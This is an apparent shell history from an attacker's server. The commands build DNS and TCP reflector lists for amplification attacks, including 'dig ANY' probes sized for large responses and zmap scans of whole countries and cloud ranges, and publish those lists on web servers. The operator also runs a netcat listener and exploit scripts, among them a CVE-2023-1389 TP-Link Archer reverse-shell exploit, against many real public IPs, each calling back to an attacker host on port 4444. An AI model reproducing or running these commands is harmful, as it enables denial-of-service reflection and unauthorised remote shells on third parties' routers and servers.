screen -r pts-0.ubuntu-c-4-intel-nyc3-01 htop ipset list | wc -l iptables -vnL tail -f /var/log/kern.log top iptables -vnL iptables -t raw -vnL top screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 tail -f /var/log/kern.log ipset list | wc -l mtr 45.167.239.20 history | grep mtr mtr 45.160.228.2 mtr 189.51.32.1 wget 189.51.32.1 -O /dev/null wget 189.51.33.92 -O /dev/null mtr mtr 189.51.33.92 mtr 189.51.34.52 mtr 189.51.33.92 mtr 189.51.34.52 ls ipset list | wc -l ipset list | less ipset list | tr ':' | less ipset list | awk {'print $1 ":53"'} | less ipset list | awk {'print $1 ":53"'} > botsDNS.txt nano botsDNS.txt cp botsDNS.txt /var/www/html/ cp botsDNS.txt /usr/share/nginx/html/ ifconfig dig ANY globo.com dig ANY globo.com @8.8.8.8 dig atlassian.com ANY dig atlassian.com ANY @8.8.8.8 dig greenpeace.org ANY @8.8.8.8 ls cd /var/www/html/ ls cat dns_any.ini cat dns_txt.ini ls cat results_any.txt cat results_any.txt | less cat results_any.txt | awk '$2 > 4000 & < 6000' | less cat results_any.txt | awk '$2 > 4000|| $2 < 6000' | less dig sl ANY dig sl ANY @8.8.8.8 dig hz ANY @8.8.8.8 dig de ANY @8.8.8.8 ls cat results_any.txt | awk '$2 > 4000 && $2 < 6000' | less cat results_any.txt | awk '$2 > 4000 && $2 < 6000' | awk {'print $1'} | less cat results_any.txt | awk '$2 > 4000 && $2 < 6000' | awk {'print $1'} | wc -l cat results_any.txt | awk '$2 > 4000 && $2 < 6000' | awk {'print $1'} > dns_any.ini ; cp dns_any.ini /usr/share/nginx/html/ cat results_txt.txt | awk '$2 > 4000 && $2 < 6000' | awk {'print $1'} > dns_txt.ini ; cp dns_txt.ini /usr/share/nginx/html/ ifconfig curl -O 174.138.89.122/dns_txt.ini ; curl -O 174.138.89.122/dns_any.ini mtr 189.51.34.52 ping 189.51.34.52 ls cat all_br.txt | less cat all_br.txt | tr ',' ' ' | less cat all_br.txt | tr ',' ' ' | awk {'print $1'} | less cat all_br.txt | tr ',' ' ' | awk {'print $1'} > lista_1.txt cat lista3.txt | less cat lista3.txt >> lista_1.txt wc -l lista_1.txt | less du -sh lista_1.txt cat lista_1.txt | less cat all_br.txt | tr ',' ' ' | awk {'print $1'} > lista_1.txt wc -l lista_1.txt cat lista3.txt >> lista_1.txt wc -l lista_1.txt history | grep zmap bgpq3 bgpq3 -S RADB -4 -A AS16509\ bgpq3 -S RADB -4 -A AS16509 bgpq3 -S RADB -4 -A AS16509 | awk {'print $5'} | less bgpq3 -S RADB -4 -A AS16509 | awk {'print $5'} >> /etc/zmap/blocklist.conf nano /etc/zmap/blocklist.conf ls history | grep zmap ls history zmap -w lista_1.txt -p 80,443 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_br.txt -B 50M ls wc -l all_br.txt | less wc -l all_br.txt | wc -l wc -l all_br.txt du -sh all_br.txt cat all_br.txt | less cat all_br.txt | tr ',' ':' | less cat all_br.txt | tr ',' ':' > /usr/share/nginx/html/all_tcp.txt cat all_br.txt | tr ',' ':' > /var/www/html/all_tcp.txt ifconfig ping 45.167.237.41 sudo mtr 45.167.237.41 ssh 45.167.237.41 sudo mtr 45.167.237.41 ssh 45.167.237.41 ping 45.167.237.41 mtr 45.178.26.1 sudo mtr 191.5.139.1 sudo mtr 189.51.33.1 ifconfig mtr 89.213.41.87 ping 89.213.41.87 ls nano aa2.py python3 aa2.py nano aa2.py python3 aa2.py nano aa2.py python3 aa2.py ssh 45.167.237.7 ssh 45.167.237.6 nano aa2.py python3 aa2.py nano aa2.py python3 aa2.py nano aa2.py python3 aa2.py nano aa2.py screen python3 aa2.py nano aa2.py python3 aa2.py screen python3 aa2.py mtr 38.190.28.1 screen -r pts-0.ubuntu-c-4-intel-nyc3-01 nano aa2.py screen python3 aa2.py screen -r pts-0.ubuntu-c-4-intel-nyc3-01 mtr 191.5.132.1 mtr 138.255.164.1 mtr 138.255.164.2 screen -r pts-0.ubuntu-c-4-intel-nyc3-01 mtr 45.178.26.1 mtr 177.8.130.1 mtr 177.8.130.2 mtr 187.84.121.1 mtr 187.84.121.2 mtr 187.84.121.3 mtr 187.84.121.4 mtr 187.87.35.1 mtr 187.87.35.2 mtr 187.87.35.3 mtr 187.87.35.10 mtr 191.5.128.1 mtr 177.185.105.1 mtr 177.185.105.2 mtr 191.5.140.1 mtr 191.5.133.1 ls screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 ls nano aa3.py nano aa2.py htop screen -r pts-0.ubuntu-c-4-intel-nyc3-01 ls wc -l botsDNS.txt tcpdump -i any -vvvnn -Qout udp and port 53 history screen -ls wc -l botsDNS.txt cat botsDNS.txt | tr ',' ' ' | awk '$2 > 300' | wc -l; cat botsDNS.txt | tr ',' ' ' | awk '$2 > 300' | wc -l ipset list | wc -l ls cat botsDNS.txt | tr ',' ' ' | awk '$2 > 300' | wc -l cat botsDNS.txt | tr ',' ' ' | awk '$2 > 300' | ipset list | wc -l cat botsDNS.txt | tr ',' ' ' | awk '$2 > 300' | less cat botsDNS.txt | tr ',' ' ' | awk '$2 > 1000' | wc -l cat botsDNS.txt | tr ',' ' ' | awk '$2 > 300' | wc -l cat botsDNS.txt | tr ',' ' ' | awk '$2 > 300' | awk {'print $1'} | less cat botsDNS.txt | tr ',' ' ' | awk '$2 > 300' | awk {'print $1'} > botsDNS_1.txt history | grep history cat botsDNS.txt | tr ',' ' ' | awk '$2 > 300' | awk {'print $1'} | less ls ipset list >> botsDNS_2.txt cat botsDNS_1.txt | less cat botsDNS_1.txt botsDNS_2.txt | wc -l cat botsDNS_1.txt | less cat botsDNS_2.txt | less nano botsDNS_2.txt cat botsDNS_1.txt botsDNS_2.txt | uniq | wc -l cat botsDNS_1.txt botsDNS_2.txt | sort | uniq | wc -l cat botsDNS_1.txt botsDNS_2.txt | sort | uniq | less cat botsDNS_1.txt botsDNS_2.txt | sort | uniq > botsDNS.txt cp botsDNS.txt /usr/share/nginx/html/ cp botsDNS.txt /var/www/html/ ls cat lista1.txt | less rm -rf lista1.txt ls wc -l /var/www/html/botsDNS.txt cat /var/www/html/botsDNS.txt | less ls ifconfig dig vimeo.com +notcp ANY @8.8.8.8 dig vimeo.com +notcp ANY @8.8.8.8 --help dig dig --help dig -h dig vimeo.com ANY @8.8.8.8 +notcp +bufsize=65536 dig vimeo.com ANY @8.8.8.8 +notcp +bufsize=5000 dig vimeo.com ANY @8.8.8.8 +notcp +bufsize=65535 dig vimeo.com ANY @8.8.8.8 +notcp +bufsize=6000 dig vimeo.com ANY @8.8.8.8 +notcp +bufsize=9000 dig -h dig vimeo.com ANY @8.8.8.8 +notcp +bufsize=9000 +all dig -h dig vimeo.com ANY @8.8.8.8 +notcp +bufsize=9000 +all +dnssec htop top dig vimeo.com ANY @8.8.8.8 +notcp +bufsize=9000 +all +dnssec ls history wc -l botsDNS.txt ls ls -la lists/ CD .. cd .. ls cd ls rm -rf all_br.txt ls -la ls mv googlecloud-ipv4.txt lists/ ls rm -rf cnn.com.pkt rm -rf europa.eu.pkt ls ls -la cat botsDNS.txt | less rm -rf botsDNS_1.txt rm -rf botsDNS_2.txt ls ls -la ls ls -la ls cp /var/www/html/all_tcp.txt . ls wc -l all_tcp.txt cat all_tcp.txt | less cat all_tcp.txt | tr ':' ' ' | less cat all_tcp.txt | tr ':' ' ' | awk {'print $1'} | less cat all_tcp.txt | tr ':' ' ' | awk {'print $1'} > botsTCP_v1.txt history | grep zmap zmap -w lists/googlecloud-ipv4.txt -p 80,443 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_gcpbr.txt -B 1G ls -la ls -la lists/ zmap -w lists/googlecloud-ipv4.txt -p 80,443 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_gcpbr.txt -B 1G screen zmap -w lists/googlecloud-ipv4.txt -p 80,443 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_gcpbr.txt -B 1G ls ls -la screen -r wc -l all_gcpbr.txt screen zmap -w lists/googlecloud-ipv4.txt -p 80,443 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_gcpbr.txt -B 1G ls cat all_gcpbr.txt | less cat all_gcpbr.txt | tr ',' ' ' | awk {'print $1'} | less cat all_gcpbr.txt | tr ',' ' ' | awk {'print $1'} >> botsTCP_v1.txt rm -rf all_gcpbr.txt ls screen zmap -w botsTCP_v1.txt -p 80,443 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o botsTCP_v2.txt -B 100M screen zmap -w botsTCP_v1.txt -p 80,443 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o botsTCP_v2.txt -B 20M iptables -vnL wc -l botsTCP_v2.txt screen -r pts-1.ubuntu-c-4-intel-nyc3-01 screen -r ls wc -l botsTCP_v2.txt cat botsTCP_v2.txt | less cat botsTCP_v2.txt | tr ',' ' ' | less cat botsTCP_v2.txt | tr ',' ':' | less cat botsTCP_v2.txt | tr ',' ':' | less/var/www/html/botsTCP.txt cat botsTCP_v2.txt | tr ',' ':' | less cat botsTCP_v2.txt | tr ',' ':' > /var/www/html/botsTCP.txt cat botsTCP_v2.txt | tr ',' ':' > /usr/share/nginx/html/botsTCP.txt wc -l botsDNS.txt | less cat botsDNS.txt | less cp botsDNS.txt /var/www/html/ cp botsDNS.txt /usr/share/nginx/html/ ifconfig cat botsDNS.txt | less cat botsDNS.txt | awk {'print $1 ":53"'} | less cat botsDNS.txt | awk {'print $1 ":53"'} > /var/www/html/botsDNS.txt cat botsDNS.txt | awk {'print $1 ":53"'} > /usr/share/nginx/html/botsDNS.txt history | grep dig dig vimeo.com ANY @8.8.8.8 +notcp +bufsize=9000 +all +dnssec dig atlassian.com ANY @8.8.8.8 +notcp +bufsize=9000 +all +dnssec dig cloudflare.com dig cloudflare.com TXT dig cloudflare.com TXT @8.8.8.8 dig cloudflare.com TXT @8.8.8.8 +notcp dig apple.com TXT @8.8.8.8 +notcp dig miro.com TXT @8.8.8.8 +notcp dig cisco.com TXT @8.8.8.8 +notcp dig miro.com TXT @8.8.8.8 +notcp dig docker.com TXT @8.8.8.8 +notcp dig docker.com TXT @8.8.8.8 +notcp +qr dig docker.com TXT @8.8.8.8 +notcp dig docker.com TXT @8.8.8.8 +notcp +qr cat aaaaa.py ls cat aaaaa.py ls cat parser.py nano parser.py screen -ls screen python3 parser.py dig @8.8.8.8 google.com AAAA +bufsize=4096 dig @8.8.8.8 facebook.com AAAA +bufsize=4096 dig @8.8.8.8 microsoft.com AAAA +bufsize=4096 dig @8.8.8.8 akamai.com AAAA +bufsize=4096 dig @8.8.8.8 cloudflare.com AAAA +bufsize=4096 dig @8.8.8.8 google.com AAAA +bufsize=4096 +additional +authority screen -ls nano results_any.txt python3 aaaaa.py python3 aaaaa.py bit.ly bit.ly.pkt nano aaaaa.py ls nano results_any.txt history history | grep zmap rm -rf botsDNS.txt screen zmap -M udp -p 53 --probe-args=file:bit.ly.pkt --output-module=csv --output-fields=saddr,udp_pkt_size --output-filter='success=1 && repeat=0' --no-header-row -o botsDNS.txt -B 1G tcpdump -i any -vvvnnn -Qout -c1000 ls wc -l botsDNS.txt tail -f botsDNS.txt | less tail -f botsDNS.txt | tr ',' ' ' | wc -l tail -f botsDNS.txt | tr ',' ' ' | awk '$2 > 500' cat botsDNS.txt | tr ',' ' ' | awk '$2 > 500' cat botsDNS.txt | tr ',' ' ' | awk '$2 > 500' | wc -l tcpdump -i any -vvnnn -Qout port 53 screen -r ls cat results_any.txt cat results_any.txt | awk {'print $1'} cat results_txt.txt | awk {'print $1'} ls hotp htop dig TXT vimeo.com dig ANY vimeo.com @8.8.8.8 dig ANY europa.eu @8.8.8.8 dig ANY vimeo.com @8.8.8.8 dig ANY forbes.com @8.8.8.8 dig ANY dropbox.com @8.8.8.8 dig ANY zoom.us @8.8.8.8 dig @8.8.8.8 ANY zoom.us dig @8.8.8.8 ANY squareup.com dig @8.8.8.8 ANY cnn.com dig @8.8.8.8 ANY zapier.com dig @8.8.8.8 ANY ups.com dig @8.8.8.8 ANY miro.com dig @8.8.8.8 ANY proton.me dig @8.8.8.8 ANY autodesk.com dig @8.8.8.8 ANY experian.com ls ipset list | less ls rm -rf botsDNS.txt ipset list | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' ipset list | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' | less ipset list | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' | wc -l ipset list | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' >> lista1.txt ls rm -rf lista3.txt rm -rf lista_1.txt ls -la history | grep zmap ls python3 aaaaa.py vimeo.com vimeo.com.pkt history | grep zmap screen zmap -M udp -p 53 --probe-args=file:vimeo.com.pkt --output-module=csv --output-fields=saddr,udp_pkt_size --output-filter='success=1 && repeat=0' --no-header-row -o botsDNS.txt -B 1G tail -f botsDNS.txt tcpdump -i any -vvvnnn port 53 -c1000 tcpdump -i any -vvvnnn port 53 -Qin -c1000 screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 ls nano vimeo.com.pkt rm -rf vimeo.com.pkt nano aaaaa.py screen zmap -M udp -p 53 --probe-args=file:vimeo.com.pkt --output-module=csv --output-fields=saddr,udp_pkt_size --output-filter='success=1 && repeat=0' --no-header-row -o botsDNS.txt -B 1G python3 aaaaa.py cnn.com cnn.com.pkt screen zmap -M udp -p 53 --probe-args=file:cnn.com.pkt --output-module=csv --output-fields=saddr,udp_pkt_size --output-filter='success=1 && repeat=0' --no-header-row -o botsDNS.txt -B 1G tcpdump -i any -vvvnnn port 53 -Qin -c1000 tcpdump -i any -vvvnnn port 53 -Qout -c1000 tcpdump -i any -vvvnnn port 53 -Qin -c1000 ipset flush ipset list | less pkill zmap screen -ls screen zmap -M udp -p 53 --probe-args=file:cnn.com.pkt --output-module=csv --output-fields=saddr,udp_pkt_size --output-filter='success=1 && repeat=0' --no-header-row -o botsDNS.txt -B 1G screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 ls tail -f botsDNS.txt cat botsDNS.txt | less cat botsDNS.txt | wc -l screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 ls cat botsDNS.txt | less cat botsDNS.txt | tr ',' ' ' | awk '$2 > 500' | less cat botsDNS.txt | tr ',' ' ' | awk '$2 > 500' | wc -l screen -ls ls iptables -vnL iptables -A INPUT -p tcp --tcp-flags SYN,ACK SYN,ACK --sport 80 -m recent --name synack_count --update --seconds 60 --hitcount 5 -j SET --add-set synack_blocked src iptables -A INPUT -p tcp --tcp-flags SYN,ACK SYN,ACK -m recent --name synack_count --update --seconds 60 --hitcount 5 -j SET --add-set synack_blocked src # Adicione ao /etc/sysctl.conf: echo 'net.core.netfilter_max_list_size = 50000000' >> /etc/sysctl.conf echo 'net.netfilter.nf_conntrack_max = 100000000' >> /etc/sysctl.conf echo 'vm.max_map_count = 262144' >> /etc/sysctl.conf sysctl -p ipset create synack_blocked hash:ip maxelem 50000000 hashsize 16777216 timeout 65536 iptables -A INPUT -p tcp --sport 80 --tcp-flags SYN,ACK SYN,ACK -m recent --name synack_count_80 --update --seconds 60 --hitcount 5 -j SET --add-set synack_blocked src iptables -A INPUT -p tcp --sport 80 --tcp-flags SYN,ACK SYN,ACK -m recent --name synack_count_80 --set # Porta 443 (HTTPS) iptables -A INPUT -p tcp --sport 443 --tcp-flags SYN,ACK SYN,ACK -m recent --name synack_count_443 --update --seconds 60 --hitcount 5 -j SET --add-set synack_blocked src iptables -A INPUT -p tcp --sport 443 --tcp-flags SYN,ACK SYN,ACK -m recent --name synack_count_443 --set # 3. Regras para dropar tráfego SYN+ACK de IPs no ipset (ambas as portas) iptables -A INPUT -p tcp --sport 80 --tcp-flags SYN,ACK SYN,ACK -m set --match-set synack_blocked src -j DROP iptables -A INPUT -p tcp --sport 443 --tcp-flags SYN,ACK SYN,ACK -m set --match-set synack_blocked src -j DROP iptables -vnL INPUT iptables -D INPUT 1 iptables -vnL INPUT history | grep zmap zmap zmap -h screen zmap -p 80,443 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_tcp_world_1.txt -B 1G -N 50000000 iptables -vnL ipset list synack_count_443 | less ipset list synack_blocked | less ipset list synack_blocked iptables -vnL ipset list synack_blocked tail -f /var/log/kern.log tcpdump -i any -vvvnn -Qout -c1000 tcpdump -i any -vvvnn -Qout -c1000 and not tcp[13] == 0x02 tcpdump -i any -vvvnn -Qout -c1000 'and not tcp[13] == 0x02' tcpdump -i any -vvvnn -Qout -c1000 not tcp[13] == 0x02 iptables -I OUTPUT -p tcp --tcp-flags ALL RST -j DROP tcpdump -i any -vvvnn -Qout -c1000 not tcp[13] == 0x02 ipset list synack_blocked tcpdump -i any -vvvnn -Qout -c1000 not tcp[13] == 0x02 ipset list synack_blocked screen -ls screen -r pts-1.ubuntu-c-4-intel-nyc3-01 screen zmap -p 80,443 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_tcp_world_1.txt -B 1G -N 50000000 iptables -vnL ipset list synack_blocked tcpdump -i any -vvvnn -Qout -c1000 not tcp[13] == 0x02 tcpdump -i any -vvvnn -Qout -c1000 -c100 iptables -vnL INPUT dmesg ipset list synack_blocked iptgables -vnL iptables -vnL screen -ls screen -r pts-1.ubuntu-c-4-intel-nyc3-01 iptables -vnL ipset list synack_blocked iptables -vnL iptables -F INPUT iptables -I INPUT -p tcp -m hashlimit --hashlimit-above 5/min --hashlimit-mode srcip --hashlimit-srcmask 32 --hashlimit-htable-size 65536 --hashlimit-htable-expire 15 -j SET --add-set synack_blocked src iptables -I INPUT -p tcp -m hashlimit --hashlimit-above 5/min --hashlimit-mode srcip --hashlimit-srcmask 32 --hashlimit-htable-size 65536 --hashlimit-htable-expire 15 --hashlimit-name teste -j SET --add-set synack_blocked src iptables -vnL iptables -A INPUT -p tcp --tcp-flags ALL SYN,ACK --sport 80 -j dROP iptables -A INPUT -p tcp --tcp-flags ALL SYN,ACK --sport 80 -j DROP iptables -A INPUT -p tcp --tcp-flags ALL SYN,ACK --sport 443 -j DROP iptables -vnL screen -ls screen zmap -p 80,443 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_tcp_world_1.txt -B 1G -N 50000000 iptables -vnL ipset list ipset list | less ipset list synack_blocked ipset list synack_blocked | wc -l iptables -vnL tail -f /var/log/lk tail -f /var/log/kern.log ifconfig top iptables -vnL ipset list synack_blocked | wc -l screen -r pts-1.ubuntu-c-4-intel-nyc3-01 iptables -vnL screen zmap -p 80,443 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_tcp_world_1.txt -B 1G -N 50000000 iptables -vnL iptables -I INPUT -p tcp --sport 25 -m hashlimit --hashlimit-above 5/min --hashlimit-mode srcip --hashlimit-srcmask 32 --hashlimit-htable-size 65536 --hashlimit-htable-expire 15 --hashlimit-name teste -j SET --add-set synack_blocked src iptables -A INPUT -p tcp --tcp-flags ALL SYN,ACK --sport 25 -j DROP screen zmap -p 25 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_tcp_world_1.txt -B 1G -N 50000000 iptables -vnL iptables -D INPUT 2 iptables -vnL ipset list synack_blocked | wc -l screen -r pts-1.ubuntu-c-4-intel-nyc3-01 iptables -vnL screen -r pts-1.ubuntu-c-4-intel-nyc3-01 zmap --help screen -r screen zmap -p 80,443 --probe-args="tcp_flags:10" --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_tcp_world_1.txt -B 1G -N 50000000 zmap -p 80,443 --probe-args="tcp_flags:10" --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_tcp_world_1.txt -B 1G -N 50000000 zmap --help ls history | grep zmap screen zmap -p 80,443 -w br-aggregated.zone--output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_br.txt -B 1G -N 10000000 zmap -p 80,443 -w br-aggregated.zone--output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_br.txt -B 1G -N 10000000 zmap -p 80,443 -w br-aggregated.zone --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_br.txt -B 1G -N 10000000 screen zmap -p 443 -w br-aggregated.zone --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_br.txt -B 1G -N 10000000 iptables -vnL wc -l all_ wc -l all_br.txt screen -ls du -sh all_br.txt cat all_br.txt | less cat all_br.txt | tr ',' ':' | less cat all_br.txt | tr ',' ':' > /var/www/html/botsTCP.txt cat all_br.txt | tr ',' ':' > /usr/share/nginx/html/botsTCP.txt ifconfig zmap -p 80,443 --probe-args="tcp_flags:10" --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_tcp_world_1.txt -B 1G -N 50000000 zmap -p 443 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_tcp_world_1.txt -B 1G -N 50000000 screen zmap -p 443 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_tcp_world_1.txt -B 1G -N 50000000 iptables -vnL iptables -D INPUT 1 iptables -vnL wc -l all_tcp_world_1.txt tcpdump -i any -vvnnn icmp w exit tcpdump -i any -vvvnnn icmp sreen -ls screen -ls exit w ps -aux w ls htop ls tcpdump -i any -vvvnnn -p icmp ping 167.99.113.69 screen -ls exit screen -ls screen -r pts-1.ubuntu-c-4-intel-nyc3-01 ps -aux | grep zmap screen -r pts-1.ubuntu-c-4-intel-nyc3-01 ls cat results_any.txt | less nano aaaaa.py nano parser.py screen -ls screen -r pts-1.ubuntu-c-4-intel-nyc3-01 du -sh all_tcp_world_1.txt wc -l all_tcp_world_1.txt cat all_tcp_world_1.txt | tr ',' ':' | less cat all_tcp_world_1.txt | tr ',' ':' | head -n 15000000 | less cat all_tcp_world_1.txt | tr ',' ':' | head -n 15000000 > /var/www/html/botsTCP.txt cat all_tcp_world_1.txt | tr ',' ':' | head -n 15000000 > /usr/share/nginx/html/botsTCP.txt screen -ls screen -r pts-1.ubuntu-c-4-intel-nyc3-01 ls python3 parser.py nano parser.py screen python3 parser.py ls cd /home/ ls nano teste.py python3 teste.py nano teste.py python3 teste.py nano teste.py python3 teste.py nano teste.py python3 teste.py nano teste.py python3 teste.py ifconfig nc -lvp 4444 ls history | grep br history | grep br-agg wget https://www.ipdeny.com/ipblocks/data/countries/br.zone iptables -F cd /home/ ls wget https://www.ipdeny.com/ipblocks/data/countries/br.zone ls nano requirements.tx nano requirements.txt pip3 install -r requirements.txt pip3 ls cat asus.txt | less ls nano teste.py python3 teste.py python3 teste.py --help python3 teste.py --device-list asus.txt nano teste.py python3 teste.py --device-list asus.txt python3 teste.py --device-list asus.txt -t 200 python3 teste.py --device-list asus.txt -h python3 teste.py --device-list asus.txt --threads 200 nano teste.py python3 teste.py python3 teste.py --help python3 teste.py --device-list asus.txt --threads 200 nano teste.py python3 teste.py python3 teste.py --device-list asus.txt --threads 200 nano teste.py python3 teste.py python3 teste.py --device-list asus.txt --threads 200 -h python3 teste.py --device-list asus.txt --threads 200 --timeout 3 nc nano teste.py python3 teste.py python3 teste.py -h python3 teste.py --device-list asus.txt --threads 200 python3 teste.py --device-list asus.txt --threads 200 --help python3 teste.py --device-list asus.txt --threads 200 --host 174.138.89.122 --port 4444 --nc-port 4444 --threads 200 --timeout 3 python3 teste.py --device-list asus.txt --threads 200 --port 4444 --nc-port 4444 --threads 200 --timeout 3 screen python3 teste.py --device-list asus.txt --threads 200 --port 4444 --nc-port 4444 --threads 200 --timeout 3 nano teste.py python3 teste.py --device-list asus.txt --threads 200 --port 4444 --nc-port 4444 --threads 200 --timeout 3 python3 teste.py --attacker-ip python3 teste.py --device-list asus.txt --threads 200 --attacker-ip 174.138.89.122--port 4444 --nc-port 4444 --threads 200 --timeout 3 python3 teste.py --device-list asus.txt --threads 200 --attacker-ip 174.138.89.122 --port 4444 --nc-port 4444 --threads 200 --timeout 3 nano teste.py python3 teste.py python3 teste.py --device-list asus.txt --threads 200 --attacker-ip 174.138.89.122 --port 4444 --nc-port 4444 --threads 200 --timeout 3 htop screen python3 teste.py --device-list asus.txt --threads 200 --attacker-ip 174.138.89.122 --port 4444 --nc-port 4444 --threads 200 --timeout 3 htop screen -r pts-0.ubuntu-c-4-intel-nyc3-01 screen python3 teste.py --device-list asus.txt --threads 200 --attacker-ip 174.138.89.122 --port 4444 --nc-port 4444 --threads 400 --timeout 3 htop screeen -r screen -r pts-0.ubuntu-c-4-intel-nyc3-01 python3 teste.py -t 59.19.205.21 --threads 200 --attacker-ip 174.138.89.122 --port 4444 --nc-port 4444 --threads 400 --timeout 3 python3 teste.py --help python3 teste.py -t 59.19.205.21 --ports 80 --threads 200 --attacker-ip 174.138.89.122 --port 4444 --nc-port 4444 --threads 400 --timeout 3 python3 teste.py -t 221.163.166.59 --ports 80 --threads 200 --attacker-ip 174.138.89.122 --port 4444 --nc-port 4444 --threads 400 --timeout 3 python3 teste.py -t 94.25.157.145 --ports 80 --threads 200 --attacker-ip 174.138.89.122 --port 4444 --nc-port 4444 --threads 400 --timeout 3 python3 teste.py -t 91.232.141.89 --ports 80 --threads 200 --attacker-ip 174.138.89.122 --port 4444 --nc-port 4444 --threads 400 --timeout 3 screen -ls screen nano teste.sh chmod +x teste. chmod +x teste.sh ./teste.sh ./teste.sh 189.97.203.160 80 screen -r pts-0.ubuntu-c-4-intel-nyc3-01 ./teste.sh 189.97.203.160 80 4444 nano teste.sh ./teste.sh 189.97.203.160 80 4444 w ifconfig ./teste.sh 189.97.203.160 80 ./teste.sh http://91.232.141.89/ 80 ./teste.sh 91.232.141.89 80 ./teste.sh 210.223.194.201 80 ./teste.sh 93.183.129.38 80 ./teste.sh 210.186.123.164 80 ./teste.sh 59.19.205.21 80 ./teste.sh 109.108.236.43 80 ./teste.sh 94.45.103.164 80 ./teste.sh 177.92.138.222 80 ./teste.sh 193.123.107.113 ./teste.sh 193.123.107.113 80 ./teste.sh 200.159.147.142 80 ./teste.sh 186.233.28.100 80 ./teste.sh 45.238.123.70 80 ./teste.sh 45.168.243.91 80 ./teste.sh 177.185.120.212 80 ./teste.sh 177.92.138.60 80 ./teste.sh 177.142.225.157 ./teste.sh 177.142.225.157 80 w screen -r reboot htop ls rm -rf all_tcp* rm -rf botsTCP* htop ls cd /home/ ls cat teste. cat teste.py ls cd ls cd /home/ ls mkdir -p cve-2023-1389 cd cve-2023-1389/ ls nano archer-rev-shell.py nano archer-file-transfer.py ls nano archer-file-transfer.py ls nano archer-rev-shell.py python3 archer-rev-shell.py python3 archer-rev-shell.py --help python3 archer-rev-shell.py -r 187.94.215.236 ifconfig python3 archer-rev-shell.py -r 187.94.215.236 -a 174.138.89.122 -p 4444 python3 archer-rev-shell.py -r 187.94.215.236:8085 -a 174.138.89.122 -p 4444 nano archer-rev-shell.py python3 archer-rev-shell.py -r 187.94.215.236:8085 -a 174.138.89.122 -p 4444 iptables -vnL ls nano script.py python3 script.py python3 script.py -r 187.94.215.236 -a 174.138.89.122 -p 4444 --test python3 script.py -r 187.94.215.236:8085 -a 174.138.89.122 -p 4444 --test nano script.py python3 script.py -r 187.94.215.236:8085 -a 174.138.89.122 -p 4444 --test python3 script.py -r 187.94.215.236:8085 -a 174.138.89.122 -p 4444 --test --help python3 script.py -r 187.94.215.236:8085 -a 174.138.89.122 -p 4444 --test python3 script.py -r 187.94.215.236:8085 -a 174.138.89.122 -p 4444 --recon ls cat script.py python3 script.py -r 187.94.215.236:8085 -a 174.138.89.122 -p 5555 --test python3 script.py -r 187.94.215.236:8085 -a 174.138.89.122 -p 5555 --testt python3 script.py -r 187.94.215.236:8085 -a 174.138.89.122 -p 5555 --test nano script.py python3 script.py -r 187.94.215.236:8085 -a 174.138.89.122 -p 5555 --test python3 script.py -r 187.94.215.236:8085 -a 174.138.89.122 -p 5555 python3 script.py -r 187.94.215.236:8085 -a 174.138.89.122 -p 5555 --help python3 script.py -r 187.94.215.236:8085 -a 174.138.89.122 -p 5555 --test-methods nano script.py python3 script.py python3 script.py -r 187.94.215.236:8085 -a 174.138.89.122 -p 5555 python3 script.py -r 187.94.215.25:8085 -a 174.138.89.122 -p 5555 python3 script.py -r 187.94.214.205 -a 174.138.89.122 -p 5555 python3 script.py -r 187.94.214.205:8085 -a 174.138.89.122 -p 5555 python3 script.py -r 187.94.214.116:8085 -a 174.138.89.122 -p 5555 ls nano teste1.py python3 teste1.py python3 teste1.py --target-ip 187.94.214.205 --target-port 8085 --reverse-shell nano teste1.py python3 teste1.py --target-ip 187.94.214.205 --target-port 8085 --reverse-shell nano teste1.py python3 teste1.py --target-ip 187.94.214.205 --target-port 8085 --reverse-shell python3 teste1.py --target-ip 187.94.214.205 --target-port 8085 --reverse-shell --ssl nano teste1.py python3 teste1.py --target-ip 187.94.214.205 --target-port 8085 --reverse-shell --ssl --no-base64 python3 teste1.py --target-ip 187.94.215.170 --target-port 8085 --reverse-shell --ssl --no-base64 nano teste1.py python3 teste1.py --target-ip 187.94.215.170 --target-port 8085 --reverse-shell --ssl --no-base64 sudo apt install golang-go -y go get github.com/spf13/pflag go get github.com/zenthangplus/goccm mkdir ~/cve-exploiter && cd ~/cve-exploiter go mod init cve-exploiter go get github.com/spf13/pflag 